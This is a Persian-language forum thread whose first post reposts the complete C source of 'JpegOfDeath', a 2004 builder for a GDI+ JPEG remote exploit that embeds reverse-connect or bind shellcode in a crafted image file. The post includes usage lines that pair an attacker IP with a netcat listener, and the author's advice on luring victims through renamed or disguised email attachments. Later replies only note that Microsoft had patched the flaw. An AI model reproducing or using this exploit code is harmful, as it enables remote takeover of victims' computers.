
موضوع: Jpeg Bug

  
  1. #1


    خواننده شناسه تصویری !!!!!!!!!!!!!!!

    Jpeg Bug

    کد HTML:
     *
     * GDI+ JPEG Remote Exploit 
     *  By John Bissell A.K.A. HighT1mes
     *
     * Exploit Name:
     * =============
     *  JpegOfDeath.c v0.5
     *
     * Date Exploit Released:
     * ======================
     *  Sep, 23, 2004
     *
     * Description:
     * ============
     *  Exploit based on FoToZ exploit but kicks the exploit up 
     *  a notch by making it have reverse connectback as well as
     *  bind features that will work with all NT based OS's.
     *  WinNT, WinXP, Win2K, Win2003, etc... Thank you FoToz for
     *  helping get a grip on the situation. I actually had got
     *  bind jpeg exploit working earlier but I could only 
     *  trigger from OllyDbg due to the heap dynamically changing...
     *
     *  If anyone who uses this exploit has used my recent AIM 
     *  remote exploit then you will have a good idea already of how
     *  to use this exploit correctly.
     *
     *  Through my limited testing I have found on a unpatched 
     *  XP SP1 system that if you click the exploit jpeg file
     *  in Windows Explorer then you will be hacked. I know there
     *  are more attack points you can take advantage of if you
     *  look for them.. So say someone goes on any web browser
     *  and they decide to save your jpeg and then later open it
     *  in explorer.exe then they will be attacked.. or maybe they
     *  got a email that has a good filename attachment title to
     *  it like "daisey fuentes porn pic.jpg" well then they 
     *  want to see it so they save it to there harddrive and open
     *  the pic in explorer.exe and game over. You just have to
     *  test and get creative. The reason this is version 0.5 is
     *  because I know rundll32.exe is MAJORALLY exploitable and I know
     *  that would make this exploit far more powerful if I 
     *  figured that part out.. I have already exploited it
     *  personally myself but I need to run some more tests to
     *  make things final for everyone... On another side note
     *  for the people out there who think you can only be affected 
     *  through viewing or downloading a jpeg attachment.. you're
     *  dead wrong.. All the attacker has to do is simply change
     *  image extension from .jpg to .bmp or .tif or whatever
     *  and stupid Windows will still treat the file as a JPEG :-p...
     *  Also the fact is this vulnerability is exploitable 
     *  without the victim clicking a link... For instance you
     *  send them the image with a 1,1 width,height and then'
     *  they can't see it in Outlook Express, so there like 
     *  man this image has a cool name so I'll try to open the
     *  attachment, then there FUCKED... Well ok they have to
     *  click in a round-about-way.. but I'm sure if you're
     *  creative enough with all those MS features you can figure
     *  something out ;-)
     *
     *  I'll most likely be putting out another version of this
     *  exploit (more dangerous) once more testing has been done. So 
     *  I encourage everyone out there to download SP2, patch your
     *  Windows systems, etc... Of course this won't be a 
     *  cure all solution :-/
     *
     * Note:
     * =====
     *  If someone wants to take advantage of the bind mode of
     *  attack in this exploit you will need to set up a script
     *  on a web server to check everyone who downloads the 
     *  jpeg exploit file and then connect back to them on the
     *  port you wanted to use with the bind attack... One of
     *  the reasons I decided to keep the bind shellcode option
     *  in here is because sometimes as you people know a
     *  firewall will be more restrictive on outbound connections
     *  and there are times where a bind attack will do just right
     *  if the reverse connect attack won't work... On ANOTHER
     *  note you can also rename your jpeg file extension to
     *  something like a .bmp or .tif and dumb Windows program's
     *  (most of them) won't give give a shit and try to load the 
     *  jpeg anyways... You can easily trick unsuspecting people 
     *  this way.. which is pretty much everyone.. right??
     *
     * Greetings:
     * ==========
     *  FoToZ, Nick DeBaggis, MicroSoft, Anthony Rocha, #romhack
     *  Peter Winter-Smith, IsolationX, YpCat, Aria Giovanni,
     *  Nick Fitzgerald, Adam Nance (where are you?),
     *  Santa Barbara, Jenna Jameson, John Kerry, so1o, 
     *  Computer Security Industry, Rom Hackers,  My chihuahuas
     *  (Rocky, Sailor, and Penny)...
     *
     *
     * Disclaimer:
     * ===========
     * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
     * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
     * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
     * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
     * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
     * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
     * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
     * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
     * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
     * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
     *
     * Look out for a better version of this exploit in a few days.. perhaps...
     *
     ********************************************************************/
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <windows.h>
    #pragma comment(lib, "ws2_32.lib")
    
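    /* Exploit Data...
     *
     * reverse_shellcode / bind_shellcode: the two alternative payloads. main()
     * writes exactly one of them, after patching a few of its bytes through
     * xor_data() (XOR with 0x92). Both arrays open with the same 25 bytes
     * (D9 E1 D9 34 24 ... 80 30 92 40 E2 FA) apart from a single byte, so that
     * prefix is a usable static signature for files produced by this builder.
     * header1 / header2: the JPEG framing written before the payload.
     * setNOPs1 / setNOPs2: short code stubs written around the padded region.
     */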
    
    char reverse_shellcode[] =
    "\xD9\xE1\xD9\x34"
    "\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
    "\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
    "\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
    "\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
    "\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
    "\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
    "\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
    "\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
    "\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
    "\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
    "\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF"
    "\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7"
    "\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54"
    "\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
    "\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
    "\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
    "\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
    "\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
    "\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
    "\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
    "\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
    "\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
    "\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
    
    char bind_shellcode[] =
    "\xD9\xE1\xD9\x34\x24\x58\x58\x58"
    "\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"
    "\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"
    "\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"
    "\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"
    "\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"
    "\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"
    "\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"
    "\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"
    "\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"
    "\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"
    "\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"
    "\xA3\x6D\xC5\xC5\xFA\x90\x92\x83\xCE\x1B\x74\xF8\x82\xC4\xC1\x6D"
    "\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"
    "\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"
    "\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"
    "\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"
    "\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"
    "\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"
    "\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"
    "\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"
    "\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"
    "\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"
    "\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"
    "\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
    
    /*
     * Opening bytes of the generated file: the JPEG SOI marker (FF D8), a
     * JFIF APP0 segment, then further marker segments.
     *
     * The part a detection rule should key on is the COM marker FF FE
     * followed by the length bytes 00 01. A JPEG segment length counts its
     * own two bytes, so any declared length below 2 is malformed.
     * NOTE(review): presumably this malformed length is the condition the
     * Microsoft GDI+ JPEG patch mentioned in the header comment fixes;
     * confirm against the vendor bulletin.
     */
    char header1[] =
    "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
    "\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
    "\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
    "\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
    "\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
    "\x2E\x3E\x35\x35\x35\x35\x35\x3E";
    
    /*
     * Short block of machine code that main() writes directly after header1.
     * NOTE(review): going by the array name and the byte pattern
     * (C6 03 90 / 43 / 3B D9 / 75 F8) it appears to overwrite the bytes that
     * follow it with 0x90; confirm by disassembly before relying on this.
     */
    char setNOPs1[] =
    "\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
    "\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";
    
    /*
     * Second stub, written by main() at the end of the 0x1000-byte region.
     * Byte-for-byte it matches setNOPs1 except for a leading 0x3E and a
     * different 32-bit constant (2F 00 00 00 instead of 00 05 00 00).
     * NOTE(review): presumably the same fill routine with a shorter range;
     * confirm by disassembly.
     */
    char setNOPs2[] =
    "\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
    "\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";
    
    char header2[] =
    "\x44"
    "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x01\x15\x19\x19"
    "\x20\x1C\x20\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\x2B"
    "\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x44\x44\x44\x44\x44\x44"
    "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
    "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\xC0\x00"
    "\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
    "\xFF\xC4\x00\xA2\x00\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\x01\x01\x01"
    "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02"
    "\x03\x10\x00\x02\x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01"
    "\x05\x01\x01\x02\x03\x00\x11\x21\x31\x12\x04\x41\x51\x22\x13\x05"
    "\x61\x32\x71\x81\x42\x91\xA1\xC1\x52\x23\x14\xB1\xD1\x62\x15\xF0"
    "\xE1\x72\x33\x06\x82\x24\xF1\x92\x43\x53\x34\x16\xA2\xD2\x63\x83"
    "\x44\x54\x25\x11\x00\x02\x01\x03\x02\x04\x03\x08\x03\x00\x02\x03"
    "\x01\x00\x00\x00\x00\x01\x11\x21\x31\x02\x41\x12\xF0\x51\x61\x71"
    "\x81\x91\xA1\xB1\xD1\xE1\xF1\x22\x32\x42\x52\xC1\x62\x13\x72\x92"
    "\xD2\x03\x23\x82\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00"
    "\x3F\x00\x0F\x90\xFF\x00\xBC\xDA\xB3\x36\x12\xC3\xD4\xAD\xC6\xDC"
    "\x45\x2F\xB2\x97\xB8\x9D\xCB\x63\xFD\x26\xD4\xC6\xD7\x70\xA4\x19"
    "\x24\x50\xCA\x46\x2B\xFC\xEB\x3B\xC7\xC9\xA5\x4A\x8F\x69\x26\xDF"
    "\x6D\x72\x4A\x9E\x27\x6B\x3E\xE6\x92\x86\x24\x85\x04\xDB\xED\xA9"
    "\x64\x8E\x6B\x63\x67\x19\x1A\xA5\xE7\xB8\x28\x3D\x09\xAB\x5D\x5F"
    "\x16\xF7\x8C\xED\x49\x4C\xF5\x01\xE6\xE5\xD5\x1C\x49\xAB\x10\x71"
    "\xA6\x36\x9B\x93\x24\x61\x00\x0F\x61\xEC\x34\xA7\x9C\x23\xF4\x96"
    "\xC6\xE6\xAF\xB7\x80\x76\xEF\x93\xF0\xAA\x28\x8A\x6B\xE0\x18\xC0"
    "\xA4\x9B\x7E\x90\x39\x03\xC2\x90\xDC\x43\x31\x91\x62\x91\x86\x23"
    "\x35\x35\xA2\x80\x4D\xFA\x72\x31\x07\x9D\x03\x70\xA8\x93\x24\x4F"
    "\x89\x51\x83\x5E\xA4\x2E\x7A\xC0\x7D\xA9\x8A\x10\x61\x64\x07\xFA"
    "\x88\xC6\x89\x26\xDA\x0F\x20\xBD\xB9\x16\xD2\xA8\xE8\x91\x3F\x1A"
    "\xE2\xBA\xF0\xBE\x74\xAB\x1D\xC4\x44\x15\x1A\x8A\x9C\xC7\x2A\x6B"
    "\xA3\x33\xB7\x1E\x88\x47\x69\xA9\x64\x68\x26\xC1\x97\x0B\xD6\x86"
    "\x8B\x1B\x29\xC6\x87\xE4\xC7\xFD\xCC\x53\x11\xA5\x9C\x62\x6A\xE5"
    "\x40\x37\x61\x89\xF6\xB2\x9C\x2A\x7C\xFD\x05\x6A\x30\x5F\x52\x02"
    "\xEB\x72\xBF\x7D\x74\x4C\x23\xB9\x8F\xD8\x78\x67\x54\x59\x64\x47"
    "\xC5\x75\x21\x18\xD5\xE3\x58\xE1\x72\x63\xBF\x6D\xBD\xCB\xCA\x82"
    "\x65\xE7\xDB\x09\x54\x4F\x0D\x95\x86\x76\xE3\xF2\xA0\x48\x82\x55"
    "\xD7\xA6\xCE\xA7\xAA\xDC\x6A\xF1\xA9\x8E\xE0\x35\xC1\xCA\xA1\xD4"
    "\x93\xD2\xD6\x39\x95\x3C\x6B\x46\x60\xAC\xC1\x3B\x60\xC9\x70\x84"
    "\x8E\xA1\x9A\x9A\x20\x01\x94\xCA\x08\x91\x53\xDC\x01\xB1\xB5\x12"
    "\x37\x11\xC6\xC1\xAC\xF1\x11\xD4\x9C\x6B\x3E\x69\x76\xF0\x1D\x7B"
    "\x52\x6D\xC9\xA8\x66\x94\xBB\x79\x8F\x7E\xDE\x17\xFD\x4D\xAB\x1E"
    "\x76\x7A\xA3\x2B\xE2\x50\x06\xB7\x2C\xEB\x2A\x49\xC9\xEA\x4E\x9B"
    "\xE7\xCA\xAF\x1E\xEC\x23\xDC\x8B\xE1\x6B\x5F\x1A\x9B\xE8\x49\x2E"
    "\x63\xE5\x03\x32\xCD\x19\xB8\x23\x10\x78\x1F\x85\x5C\x15\x8C\x97"
    "\x84\x9B\xDB\x15\x35\x9F\x16\xE0\x1E\x86\xB9\x8F\x97\x11\x4E\xDA"
    "\x35\x02\x45\x25\x93\xF8\x55\x24\x17\xB9\x1B\xF5\xC8\x07\xA9\xE2"
    "\x2A\x76\xB0\xC2\x37\x01\x95\xAD\x81\xB6\x1C\x6A\xA2\x38\xD9\xAE"
    "\xCA\x59\x18\x75\x25\xFF\x00\x81\xAE\xD8\xE8\xBB\x47\x62\xAC\xB7"
    "\xB6\xA1\x8D\x40\xE3\x86\x65\x6D\x1E\xDB\x89\x2F\x9D\xCD\x6B\x24"
    "\x62\x41\x61\x89\xAC\x2D\x8B\x3E\xB6\x68\xC0\x63\x73\x70\x6B\x6B"
    "\x6A\xA1\x7A\xAC\x56\xE7\x11\x56\x58\xD4\x13\xA4\x0B\xB6\xEB\xB3"
    "\x3B\x47\x22\x95\xD3\x53\x2E\xEA\x19\x86\x96\xF7\x03\x83\x52\x9E"
    "\x54\xAB\x6E\x58\x63\x7C\x33\xCE\x93\xB1\x19\x1C\xE9\xDB\xAA\x35"
    "\xBF\x46\x8D\xD4\xD2\x56\xE0\xE0\x33\xA1\x4D\x0A\x4E\x3B\xB1\xCD"
    "\xD4\x06\x44\x56\x4A\xCD\x24\x26\xEA\x6D\x7A\x87\xDC\x3B\x60\x6D"
    "\xFC\x2A\x86\x1B\x97\x36\x6D\x42\x04\xA0\x11\xEE\xE7\x46\x22\x35"
    "\xD5\x26\xB0\x1C\x0B\x7C\x69\x5F\x06\xEC\x5A\xC5\x0B\x46\x70\x27"
    "\xF2\xD4\x79\xAD\x89\xDA\x30\x74\xBD\x98\xE4\x68\x58\x86\xE4\x1B"
    "\x69\xB9\xDC\x2B\x30\x87\x48\x53\xC5\x85\x3B\xDD\x8A\x4E\xB5\x42"
    "\xB2\x8C\x6E\x2C\x01\xF8\x56\x04\x7B\xC9\xA3\x05\x4F\xB4\xD5\xA2"
    "\xDF\xF6\xFD\xC6\xE2\xA7\x3C\x89\x24\xFE\xA9\x5E\xC3\xD4\x6D\xF7"
    "\x85\xC9\x59\x39\x63\x59\x9B\xFF\x00\x06\x1A\x5E\xFA\x69\x0A\x46"
    "\x2B\xC0\x9F\xC2\x91\x8B\xC9\x40\x58\x16\xBD\xF2\xC0\xD3\x3B\x7F"
    "\x2D\xA9\xBB\x2E\x49\x42\x6D\x52\x70\x39\x62\x9F\x08\x73\x6F\x20"
    "\x09\x64\x00\x01\x83\x2B\x00\xD5\x97\xBC\xDC\xF6\x9C\xA7\x66\xEA"
    "\xD9\xB6\x9F\xE1\x56\xDE\xBA\xEC\x65\xB4\x44\xD8\xE3\x8D\x52\x2F"
    "\x36\xCE\x74\x33\x7E\x9F\x2E\x22\x99\x8B\xC9\x6D\x5A\x6D\x9E\xA8"
    "\x22\xC7\x0C\xA8\x62\x3D\x17\x1D\x2F\xC8\xFA\xD4\xB0\x9E\x14\x45"
    "\x45\xD5\x6E\x96\x04\xE1\xF1\xA0\x37\x90\x5B\xD8\x7F\x81\x57\x1B"
    "\xC8\xD5\x48\x27\x0E\x3C\x6B\x3D\xCD\x44\x15\x92\x41\x25\x94\x82"
    "\xAE\x0E\x42\x97\x8D\x8C\x6D\xAE\x56\xB8\x26\xD8\x0F\xE3\x43\x93"
    "\x73\x18\x75\x28\xD7\xF8\xD5\xFF\x00\x74\xE4\x18\xC2\x82\xAC\x6F"
    "\x86\x7F\x2A\x4C\xBE\xE5\xFC\xD2\x22\xCC\x9A\x32\xD1\x7C\x7D\x68";
    
    /* Code... */
    
    /*
     * Apply the single-byte XOR key 0x92 to one byte and return the result.
     * main() uses this for every address/port byte it patches into a payload
     * array, so the patched bytes are stored in encoded form.
     */
    unsigned char xor_data(unsigned char byte)
    {
    	const unsigned char key = 0x92;

    	return (unsigned char)(byte ^ key);
    }
    
    /*
     * Print the command-line help for the builder and terminate the process.
     *
     * prog_name: program name substituted into the usage and example lines
     *            (main passes argv[0]).
     *
     * Does not return: the function ends with exit(-1).
     */
    void print_usage(char *prog_name)
    {
    	printf(" Exploit Usage:\n");
    	printf("\t%s -r your_ip | -b [-p port] <jpeg_filename>\n\n", prog_name);
    	printf(" Parameters:\n");
    	printf("\t-r your_ip or -b\t Choose -r for reverse connect attack mode\n\t\t\t\t
    and choose -b for a bind attack. By default\n\t\t\t\t if you don't specify -r or
    -b then a bind\n\t\t\t\t attack will be generated.\n\n");
    	printf("\t-p (optional)\t\t This option will allow you to change the port \n\t\t\t\t
    used for a bind or reverse connect attack.\n\t\t\t\t If the attack mode is bind
    then  the\n\t\t\t\t victim will open the -p port. If the attack\n\t\t\t\t mode
    is reverse connect  then the port you\n\t\t\t\t specify will be the one you want
    to listen\n\t\t\t\t on so the victim can  connect to you\n\t\t\t\t right away.\n\n");
    	printf(" Examples:\n");
    	printf("\t%s -r 68.6.47.62 -p 8888 test.jpg\n", prog_name);
    	printf("\t%s -b -p 1542 myjpg.jpg\n", prog_name);
    	printf("\t%s -b whatever.jpg\n", prog_name);
    	printf("\t%s -r 68.6.47.62 exploit.jpg\n\n", prog_name);
    	printf(" Remember if you use the -r option to have netcat listening\n");
    	printf(" on the port you are using for the attack so the victim will\n");
    	printf(" be able to connect to you when exploited...\n\n");
    	printf(" Example:\n");
    	printf("\tnc.exe -l -p 8888");
    	/* Usage is only printed on a bad invocation, so leave with an error status. */
    	exit(-1);
    }
    
    /*
     * Builder entry point: parses the command line, patches the selected
     * payload array in place and writes the crafted JPEG to the file named by
     * the last argument.
     *
     * Options handled below: -r <ip> (attack_mode 1), -b (attack_mode 2, the
     * default) and -p <port> (default 1337).
     *
     * Output layout, in write order: header1, setNOPs1, header2, 0x90 padding,
     * the chosen payload, 0x90 padding, setNOPs2, then the EOI marker FF D9.
     * Only the patched address/port bytes differ between files produced by
     * this program; every other byte is constant, which is what makes static
     * signatures on the output practical.
     *
     * Returns EXIT_SUCCESS after writing the file and EXIT_FAILURE if the
     * output file cannot be opened; exits with -1 if Winsock fails to start.
     */
    int main(int argc, char *argv[])
    {
    	FILE *fout;
    	unsigned int i = 0,j = 0;
    	int raw_num = 0;
    	unsigned long port = 1337; /* default port for bind and reverse attacks */
    	unsigned long encoded_port = 0;
    	unsigned long encoded_ip = 0;
    	unsigned char attack_mode = 2; /* bind by default */
    	char *p1 = NULL, *p2 = NULL;
    	char ip_addr[256];
    	char str_num[16];
    	char jpeg_filename[256];
    	WSADATA wsa;
    
    	printf(" +------------------------------------------------+\n");
    	printf(" |  JpegOfDeath - Remote GDI+ JPEG Remote Exploit |\n");
    	printf(" |    Exploit by John Bissell A.K.A. HighT1mes    |\n");
    	printf(" |              September, 23, 2004               |\n");
    	printf(" +------------------------------------------------+\n");
    	if (argc < 2)
    		print_usage(argv[0]);
    
    	/* process commandline */
    	/* The scan starts at index 0, so argv[0] is examined as well. */
    	/* NOTE(review): argv[i+1] is read without checking that it exists. */
    	for (i = 0; i < (unsigned) argc; i++) {
    		if (argv[i][0] == '-') {
    			switch (argv[i][1]) {
    			case 'r':
    				/* reverse connect */
    				strncpy(ip_addr, argv[i+1], 20);
    				attack_mode = 1;
    				break;
    			case 'b':
    				/* bind */
    				attack_mode = 2;
    				break;
    			case 'p':
    				/* port */
    				port = atoi(argv[i+1]);
    				break;
    			}
    		}
    	}
    
    	/* The loop leaves i == argc, so argv[i-1] is the last argument. */
    	strncpy(jpeg_filename, argv[i-1], 255);
    	fout = fopen(argv[i-1], "wb");
            
    	if( !fout ) {
    		printf("Error: JPEG File %s Not Created!\n", argv[i-1]);
    		return(EXIT_FAILURE);
    	}
    
    	/* initialize the socket library */
    	/* No socket is opened in this function; Winsock is started for htonl() below. */
    	if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
    		printf("Error: Winsock didn't initialize!\n");
    		exit(-1);
    	}
    
    	/* Only bits 16..31 of encoded_port are consumed by the patches below. */
    	encoded_port = htonl(port);
    	encoded_port += 2;
    	if (attack_mode == 1) {
    		/* reverse connect attack */
    		/* Offsets 184..187: two fixed bytes, then the two encoded port bytes. */
    		reverse_shellcode[184] = (char) 0x90;
         	reverse_shellcode[185] = (char) 0x92;
    		reverse_shellcode[186] = xor_data((char)((encoded_port >> 16) & 0xff));
    		reverse_shellcode[187] = xor_data((char)((encoded_port >> 24) & 0xff));
    
    		/* Split the dotted address at each '.' and store the four octets,
    		 * each passed through xor_data(), at offsets 179..182. */
    		p1 = strchr(ip_addr, '.');
    		strncpy(str_num, ip_addr, p1 - ip_addr);
    		raw_num = atoi(str_num);
    		reverse_shellcode[179] = xor_data((char)raw_num);
    
    		p2 = strchr(p1+1, '.');
    		strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1);
    		raw_num = atoi(str_num);
    		reverse_shellcode[180] = xor_data((char)raw_num);
    
    		p1 = strchr(p2+1, '.');
    		strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2);
    		raw_num = atoi(str_num);
    		reverse_shellcode[181] = xor_data((char)raw_num);
    
    		p2 = strrchr(ip_addr, '.');
    		strncpy(str_num, p2+1, 5);
    		raw_num = atoi(str_num);
    		reverse_shellcode[182] = xor_data((char)raw_num);
    	}
    	if (attack_mode == 2) {
    		/* bind attack */ 
    		/* Offsets 204..205 get fixed bytes; 191..192 get the encoded port bytes. */
    		bind_shellcode[204] = (char) 0x90;
         	bind_shellcode[205] = (char) 0x92;
    		bind_shellcode[191] = xor_data((char)((encoded_port >> 16) & 0xff));
    		bind_shellcode[192] = xor_data((char)((encoded_port >> 24) & 0xff));
    	}
    
    	/* build the exploit jpeg */
    	/* j = bytes about to be written by the three loops below (each array
    	 * is written without its terminating NUL, hence the -3). */
    	j = sizeof(header1) + sizeof(setNOPs1) + sizeof(header2) - 3;
          
    	for(i = 0; i < sizeof(header1) - 1; i++)
    		fputc(header1[i], fout);
    	for(i=0;i<sizeof(setNOPs1)-1;i++)
    		fputc(setNOPs1[i], fout);
    	for(i=0;i<sizeof(header2)-1;i++)
    		fputc(header2[i], fout);
    	/* Pad with 0x90 up to file offset 0x63c. */
    	for( i = j; i < 0x63c; i++) 
    		fputc(0x90, fout);
    		/* Despite its indentation, the next statement is not part of the
    		 * loop above; it runs once, after the loop has finished. */
    		j = i;
    	if (attack_mode == 1) {
    		for(i = 0; i < sizeof(reverse_shellcode) - 1; i++)
    			fputc(reverse_shellcode[i], fout);
    	}
    	else if (attack_mode == 2) {
    		for(i = 0; i < sizeof(bind_shellcode) - 1; i++)
    			fputc(bind_shellcode[i], fout);
    	}
    	/* i + j is the running file offset; pad with 0x90 so that setNOPs2
    	 * ends at offset 0x1000. */
    	for(i = i + j; i < 0x1000 - sizeof(setNOPs2) + 1; i++)
    		fputc(0x90, fout); 
    	for( j = 0; i < 0x1000 && j < sizeof(setNOPs2) - 1; i++, j++)
    		fputc(setNOPs2[j], fout);
            
    	/* JPEG end-of-image marker. */
    	fprintf(fout, "\xFF\xD9");
    
    	fcloseall();
    
    	WSACleanup();
    
    	printf("  Exploit JPEG file %s has been generated!\n", jpeg_filename);
    
    	return(EXIT_SUCCESS);
    }




  2. #2
    نام حقيقي: محمد حکیمی

    Administrator شناسه تصویری Hakimi
    و مایکروسافت از ماهها پیش، Security Update مربوط به این Bug را منتشر کرده است: http://www.microsoft.com/security/bu...0409_jpeg.mspx



  3. #3


    خواننده شناسه تصویری !!!!!!!!!!!!!!!

    Icon13 عجب!!

    نقل قول نوشته اصلی توسط koorosh
